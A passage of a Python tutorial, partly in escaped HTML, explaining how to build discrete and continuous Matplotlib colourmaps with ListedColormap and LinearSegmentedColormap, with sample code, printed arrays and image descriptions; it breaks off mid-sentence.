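from matplotlib.colors import LinearSegmentedColormap, ListedColormap

viridis = mpl.colormaps["viridis"]
cool = mpl.colormaps["cool"]

# Print the class name of each colourmap object
print(type(viridis).__name__)
print(type(cool).__name__)

# Calling a colourmap with a float between 0 and 1 returns an RGBA tuple
start_colour = viridis(0.0)
end_colour = viridis(1.0)
print(start_colour)
print(end_colour)
```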
&lt;h3 id="listedcolormaps"&gt;ListedColormaps&lt;/h3&gt;
&lt;p&gt;The colours for a &lt;code&gt;ListedColormap&lt;/code&gt; are stored in a &lt;code&gt;.colors&lt;/code&gt; attribute. We can take a look at the &lt;code&gt;.colors&lt;/code&gt; attribute of the inbuilt
&amp;ldquo;viridis&amp;rdquo; colourmap with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Sample 5 values from map&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;viridis &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colormaps[&lt;span style="color:#a5d6ff"&gt;&amp;#34;viridis&amp;#34;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;resampled(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(viridis&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colors)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [[0.267004 0.004874 0.329415 1. ]
## [0.229739 0.322361 0.545706 1. ]
## [0.127568 0.566949 0.550556 1. ]
## [0.369214 0.788888 0.382914 1. ]
## [0.993248 0.906157 0.143936 1. ]]
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This is a 5 x 4 array of RGBA values (as we sampled 5 values from the full map).&lt;/p&gt;
&lt;h4 id="creating-a-discrete-listedcolormap"&gt;Creating a discrete ListedColormap&lt;/h4&gt;
&lt;p&gt;To create a discrete colourmap we can simply pass a list of
colours to &lt;code&gt;ListedColormap&lt;/code&gt;. These can be given as
&lt;a href="https://matplotlib.org/stable/gallery/color/named_colors.html" rel="external"&gt;named Matplotlib colours&lt;/a&gt;,
or as hex values.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.colors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ListedColormap
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;discrete_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap([&lt;span style="color:#a5d6ff"&gt;&amp;#34;#12a79d&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#293d9b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#40b93c&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To look at this colourmap we will use the following code.
This plots a colourbar on its own.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_cmap&lt;/span&gt;(cmap):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig, cax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subplots(figsize&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cb1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colorbar&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Colorbar(cax, cmap&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;cmap, orientation&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;horizontal&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tight_layout()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;show()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(discrete_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/discrete-colour-bar-hex-4-7.png" alt="Horizontal colour bar, evenly split into four discrete colours: turquoise,
dark blue, light blue, green. The x-axis ranges from 0 to 1." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;We can also specify the number of colours we want in the colourmap with the argument &lt;code&gt;N&lt;/code&gt;.
If &lt;code&gt;N&lt;/code&gt; is greater than the length of the list provided then the colours are repeated,
otherwise the map is truncated at &lt;code&gt;N&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;discrete_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;#12a79d&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#293d9b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#40b93c&amp;#34;&lt;/span&gt;], N&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(discrete_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/discrete-colour-bar-hex-8-9.png" alt="Horizontal colour bar, evenly split into eight discrete colours. The four colours
turquoise, dark blue, light blue, green are repeated. The x-axis ranges from 0 to 1." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;As well as using named/hex colours, we can also create a colourmap by passing an N x 3 or
N x 4 array of RGB or RGBA values to &lt;code&gt;ListedColormap&lt;/code&gt;.
To recreate the first four-colour map from RGB values, this would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;array([
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;167&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;157&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;41&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;61&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;155&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;72&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;152&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;168&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;64&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;185&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;discrete_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap(carray)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(discrete_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/discrete-colourbar-rgb-11.png" alt="Horizontal colour bar evenly split into four discrete colours: turquoise,
dark blue, light blue, green. The x-axis ranges from 0 to 1." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;Note that the RGB values here were originally on a scale of 0&amp;ndash;255,
whereas Matplotlib expects a scale of 0&amp;ndash;1, hence the division of our array by 255.&lt;/p&gt;
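&lt;p&gt;The hex and RGB versions of the palette describe the same colours. As a rough check, &lt;code&gt;matplotlib.colors.to_rgba_array&lt;/code&gt; converts the hex strings to values on the 0&amp;ndash;1 scale, and multiplying by 255 recovers the integers used in the array. The variable names below are illustrative.&lt;/p&gt;

```python
import numpy as np
from matplotlib.colors import to_rgba_array

hex_colours = ["#12a79d", "#293d9b", "#4898a8", "#40b93c"]

# 4 x 4 array of RGBA values on the 0-1 scale that Matplotlib expects
rgba = to_rgba_array(hex_colours)

# Drop the alpha column and rescale to 0-255 integers
rgb_255 = np.round(rgba[:, :3] * 255).astype(int)
print(rgb_255)
```

&lt;p&gt;The same function can be useful when brand colours are supplied as hex codes but you need an array to manipulate numerically.&lt;/p&gt;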
&lt;h4 id="creating-a-continuous-listedcolormap"&gt;Creating a continuous ListedColormap&lt;/h4&gt;
&lt;p&gt;To create a continuous colourmap we need an array of gradually changing colours.
This can be achieved using &lt;code&gt;np.linspace(start, stop, num)&lt;/code&gt;. For example, to generate a fading colourmap,
we can use an RGB value from above as the start point, and white (1) as the endpoint.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;N &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# No. of colours (large enough to appear continuous)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create N x 3 array of ones&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ones((N, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Assign columns of array&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray[:, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(&lt;span style="color:#a5d6ff"&gt;72&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, N)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray[:, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(&lt;span style="color:#a5d6ff"&gt;152&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, N)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray[:, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(&lt;span style="color:#a5d6ff"&gt;168&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, N)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create colourmap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cont_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap(carray)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(cont_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/continuous-colourbar-13.png" alt="Horizontal colour bar fading from turquoise on the left to white on the right. The x-axis ranges
from 0 to 1." width="768" /&gt;&lt;/p&gt;
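&lt;p&gt;The three column assignments can also be written as a single call, because &lt;code&gt;np.linspace&lt;/code&gt; accepts array-like &lt;code&gt;start&lt;/code&gt; and &lt;code&gt;stop&lt;/code&gt; values (NumPy 1.16 or later). The following is a sketch under that assumption; &lt;code&gt;start_rgb&lt;/code&gt; and &lt;code&gt;end_rgb&lt;/code&gt; are illustrative names.&lt;/p&gt;

```python
import numpy as np
from matplotlib.colors import ListedColormap

N = 100  # No. of colours (large enough to appear continuous)

start_rgb = np.array([72, 152, 168]) / 255  # same start colour as above
end_rgb = np.ones(3)                        # white

# Interpolate all three channels at once, giving an N x 3 array
carray = np.linspace(start_rgb, end_rgb, N)

cont_cmap = ListedColormap(carray)
print(carray.shape)
```

&lt;p&gt;Swapping &lt;code&gt;end_rgb&lt;/code&gt; for another colour gives a map that blends between two colours rather than fading to white.&lt;/p&gt;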
&lt;h3 id="linearsegmentedcolormaps"&gt;LinearSegmentedColormaps&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;LinearSegmentedColormap&lt;/code&gt;s do not have a &lt;code&gt;.colors&lt;/code&gt; attribute. However, we can access the values in the colourmap by calling it with an array of integers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cool &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colormaps[&lt;span style="color:#a5d6ff"&gt;&amp;#34;cool&amp;#34;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;resampled(&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cool(range(&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## array([[0. , 1. , 1. , 1. ],
## [0.14285714, 0.85714286, 1. , 1. ],
## [0.28571429, 0.71428571, 1. , 1. ],
## [0.42857143, 0.57142857, 1. , 1. ],
## [0.57142857, 0.42857143, 1. , 1. ],
## [0.71428571, 0.28571429, 1. , 1. ],
## [0.85714286, 0.14285714, 1. , 1. ],
## [1. , 0. , 1. , 1. ]])
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Rather than taking a list of colours that make up the map, &lt;code&gt;LinearSegmentedColormap&lt;/code&gt;s take
an argument called &lt;code&gt;segmentdata&lt;/code&gt;. This argument is a dictionary with the keys &amp;ldquo;red&amp;rdquo;, &amp;ldquo;green&amp;rdquo;
and &amp;ldquo;blue&amp;rdquo;. Each value in the dictionary is a list of tuples, ordered by position.
Each tuple has the form (&lt;code&gt;i&lt;/code&gt;, &lt;code&gt;y[i-1]&lt;/code&gt;, &lt;code&gt;y[i+1]&lt;/code&gt;). Here &lt;code&gt;i&lt;/code&gt; is
a position on the map between 0 and 1, &lt;code&gt;y[i-1]&lt;/code&gt; is the colour value that the channel reaches just before &lt;code&gt;i&lt;/code&gt;, and &lt;code&gt;y[i+1]&lt;/code&gt; is the colour value
it takes just after &lt;code&gt;i&lt;/code&gt;. When the two values differ, the channel jumps at &lt;code&gt;i&lt;/code&gt;. The other colour values on the map are obtained by performing linear interpolation between
these specified &lt;em&gt;anchor points&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;For example, we could have the following &lt;code&gt;segmentdata&lt;/code&gt; dictionary:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cdict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;: [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# start off with r=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.25&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# r increases from 0-1 bewteen 0-0.25, then drops to 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# end with r=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;green&amp;#34;&lt;/span&gt;: [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# start off with g=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.25&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# at 0.25, g is still 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# g increases from 0-1 between 0.25-0.75, then drops to 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# g is 0 between 0.75 and 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;: [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# start off with b=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# b is 0 between 0 and 0.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# b increases from 0 to 1 between points 0.75 and 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this map,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;red increases from 0 to 1 over the first quarter of the map and then drops back to 0.&lt;/li&gt;
&lt;li&gt;green increases from 0 to 1 over the middle half of the map and then drops back to 0.&lt;/li&gt;
&lt;li&gt;blue stays at 0 until the final quarter of the map and then increases from 0 to 1 over that final quarter.&lt;/li&gt;
&lt;/ul&gt;
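&lt;p&gt;To make the interpolation rule concrete, here is a minimal pure-Python sketch that evaluates a single channel at a given position. The helper name &lt;code&gt;channel_value&lt;/code&gt; is hypothetical, and this is not how Matplotlib implements it internally (Matplotlib builds a discrete lookup table, so its values will only approximately match). The sketch simply interpolates from the value after one anchor point to the value before the next.&lt;/p&gt;

```python
from bisect import bisect_right


def channel_value(anchors, x):
    """Return the interpolated channel value at position x (0 to 1).

    anchors is a list of (position, value_before, value_after) tuples,
    sorted by position, in the same layout as the segmentdata lists.
    Hypothetical helper for illustration only.
    """
    positions = [a[0] for a in anchors]
    # index of the anchor to the right of x, clamped to a valid segment
    k = max(1, min(bisect_right(positions, x), len(anchors) - 1))
    x0, _, y_start = anchors[k - 1]  # value just after the left anchor
    x1, y_end, _ = anchors[k]        # value just before the right anchor
    t = (x - x0) / (x1 - x0)
    return y_start + t * (y_end - y_start)


# the same anchor points as in the dictionary above
red = [(0, 0, 0), (0.25, 1, 0), (1, 0, 0)]
green = [(0, 0, 0), (0.25, 0, 0), (0.75, 1, 0), (1, 0, 0)]
blue = [(0, 0, 0), (0.75, 0, 0), (1, 1, 1)]

print(channel_value(red, 0.125))   # halfway up the red ramp: 0.5
print(channel_value(green, 0.5))   # halfway up the green ramp: 0.5
print(channel_value(blue, 0.5))    # blue has not started yet: 0.0
```

&lt;p&gt;At exactly 0.25 this sketch returns the value after the anchor, so red is already back at 0 there.&lt;/p&gt;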
&lt;p&gt;&lt;code&gt;LinearSegmentedColormap&lt;/code&gt; also takes a name argument. We can create a map from the dictionary
above with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.colors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; LinearSegmentedColormap
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;seg_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; LinearSegmentedColormap(&lt;span style="color:#a5d6ff"&gt;&amp;#34;seg_cmap&amp;#34;&lt;/span&gt;, cdict)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(seg_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/linseg-cbar-cdict-15.png" alt="Horizontal colour bar with an x-axis range from 0 to 1. It starts as black at x=0 and
gradually changes to red at x=0.25. It goes sharply to black again and gradually changes to green
until x=0.75. It is black again and gradually changes to blue until x=1.0." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;This way of creating a colourmap is a bit long-winded. Luckily, there is an easier
